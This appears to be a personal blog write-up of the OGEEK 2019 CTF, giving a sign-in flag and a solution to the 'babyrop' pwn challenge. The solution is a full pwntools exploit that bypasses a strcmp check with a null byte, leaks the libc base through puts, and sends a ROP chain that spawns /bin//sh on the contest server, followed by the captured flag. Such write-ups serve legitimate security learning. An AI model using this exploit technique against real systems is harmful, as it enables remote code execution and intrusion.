OGEEK 2019 Writeup

1nv0k3r's notebook

2019-08-24

签到

flag{Reno}

babyrop

输入一个字符串和一个随机串通过strcmp比较, 如果比较成功可以到达漏洞点进行栈溢出

可以通过在输入串开头加'\x00'来绕过, 然后栈溢出leak libc基地址, 之后利用ropgadget搞个ropchain即可getshell

from pwn import *
from struct import pack
# r = process('./babyrop')
context.log_level='debug'
r = remote('47.112.137.238', 13337)
r.sendline('\x00' + '\xff' * 0x10)
r.recv() # Corret!
# leak libc base
sleep(1)
puts_plt_addr = 0x08048548
puts_got_addr = 0x08049FD4
ret_addr = 0x08048825
r.send('a'*0xeb + p32(puts_plt_addr) + p32(ret_addr) + p32(puts_got_addr))
libc_base = u32(r.recv()) - ELF('libc-2.23.so').symbols['puts']

r.sendline('\x00' + '\xff' * 0x10)

# Padding goes here
p = ''

p += pack('<I', libc_base + 0x00001aa6) # pop edx ; ret
p += pack('<I', libc_base + 0x001b0040) # @ .data
p += pack('<I', libc_base + 0x00023f97) # pop eax ; ret
p += '/bin'
p += pack('<I', libc_base + 0x0006b34b) # mov dword ptr [edx], eax ; ret
p += pack('<I', libc_base + 0x00001aa6) # pop edx ; ret
p += pack('<I', libc_base + 0x001b0044) # @ .data + 4
p += pack('<I', libc_base + 0x00023f97) # pop eax ; ret
p += '//sh'
p += pack('<I', libc_base + 0x0006b34b) # mov dword ptr [edx], eax ; ret
p += pack('<I', libc_base + 0x00001aa6) # pop edx ; ret
p += pack('<I', libc_base + 0x001b0048) # @ .data + 8
p += pack('<I', libc_base + 0x0002c5fc) # xor eax, eax ; ret
p += pack('<I', libc_base + 0x0006b34b) # mov dword ptr [edx], eax ; ret
p += pack('<I', libc_base + 0x00018395) # pop ebx ; ret
p += pack('<I', libc_base + 0x001b0040) # @ .data
p += pack('<I', libc_base + 0x000b4047) # pop ecx ; ret
p += pack('<I', libc_base + 0x001b0048) # @ .data + 8
p += pack('<I', libc_base + 0x00001aa6) # pop edx ; ret
p += pack('<I', libc_base + 0x001b0048) # @ .data + 8
p += pack('<I', libc_base + 0x0002c5fc) # xor eax, eax ; ret
p += pack('<I', libc_base + 0x00007eec) # inc eax ; ret
p += pack('<I', libc_base + 0x00007eec) # inc eax ; ret
p += pack('<I', libc_base + 0x00007eec) # inc eax ; ret
p += pack('<I', libc_base + 0x00007eec) # inc eax ; ret
p += pack('<I', libc_base + 0x00007eec) # inc eax ; ret
p += pack('<I', libc_base + 0x00007eec) # inc eax ; ret
p += pack('<I', libc_base + 0x00007eec) # inc eax ; ret
p += pack('<I', libc_base + 0x00007eec) # inc eax ; ret
p += pack('<I', libc_base + 0x00007eec) # inc eax ; ret
p += pack('<I', libc_base + 0x00007eec) # inc eax ; ret
p += pack('<I', libc_base + 0x00007eec) # inc eax ; ret
p += pack('<I', libc_base + 0x00002c87) # int 0x80

r.send('a' * 0xeb + p)
r.interactive()

flag{BXCTFKKAZ8!bw&kN}